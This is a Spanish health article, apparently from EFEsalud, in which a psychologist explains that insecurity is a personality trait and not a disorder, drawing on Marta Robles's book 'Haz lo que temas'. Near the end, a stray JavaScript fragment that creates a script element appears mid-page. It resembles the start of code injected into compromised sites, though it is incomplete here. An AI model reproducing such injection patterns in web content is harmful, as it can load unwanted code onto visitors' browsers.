A la inseguridad no le debes temer

La inseguridad no es una patología, no cumple los criterios de los manuales diagnósticos para ser una patología. Tampoco supone un trastorno

MADRID.- La inseguridad no es una enfermedad, tampoco un trastorno; incluso puede ser una fuente de fortaleza, pero hay que saber transformarla y gestionarla. EFEsalud ha conversado con la psicóloga Paula Martín de Bustamante, quien ofreció su versión como experta en el libro “Haz lo que temas”, de la periodista y escritora Marta Robles. Comienza 2017 plantando cara a tu inseguridad.

En el libro de Marta Robles, donde la autora expone una reflexión en primera persona sobre su inseguridad, Paula completó cada uno de los capítulos con la visión especializada del tema tratado.

Estas son las primeras palabras de Paula en el libro: “La inseguridad es una de las emociones más fuertes, más penetrantes y más invalidantes que existen. Está con nosotros desde el momento que nacemos, es una de las primeras en aparecer y nos acompaña hasta el final de la vida. La inseguridad es miedo. Miedo a que nos digan que no, a que nos digan que sí, a hacerlo mal, a quedar en ridículo, a no ser suficientemente buenos, a no ser merecedores de cariño, a no valer la pena como personas, a no ser dignos de amor y a un sinfín de circunstancias que abarcan todas las esferas de la vida personal, social y laboral”.

Y en la entrevista con EFEsalud, la psicóloga amplia un poco más este concepto: “Todas las personas presentan momentos de inseguridad en situaciones de su vida, el problema surge cuando la inseguridad se apodera del día a día”.

Paula, ¿cuáles son las causas de la inseguridad y que consecuencias tiene?, son múltiples, y pueden ir desde patrones de crianza, al temperamento de la persona o el fruto de experiencias personales. Se debe hablar de multicausalidad.

¿Se cura la inseguridad?

La inseguridad no es una patología, no cumple los criterios de los manuales diagnósticos para ser una patología. Tampoco supone un trastorno, por tanto,  hablar en términos de cura no tiene sentido. La inseguridad puede estar relacionada con algunos trastornos de la personalidad, como los dependientes, narcisistas… pero no está caracterizada como un síntoma de estos cuadros. No debemos caer en el error de patologizar lo normal en términos de salud. No todo es un trastorno y, por tanto, no todo “se cura”.

La inseguridad tampoco es una actitud, ya que sobre éstas tenemos un mayor control y dependen de nosotros; constituye un rasgo de personalidad, y fruto de ese rasgo, y en función de una situación concreta, se manifiesta una conducta.

 var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado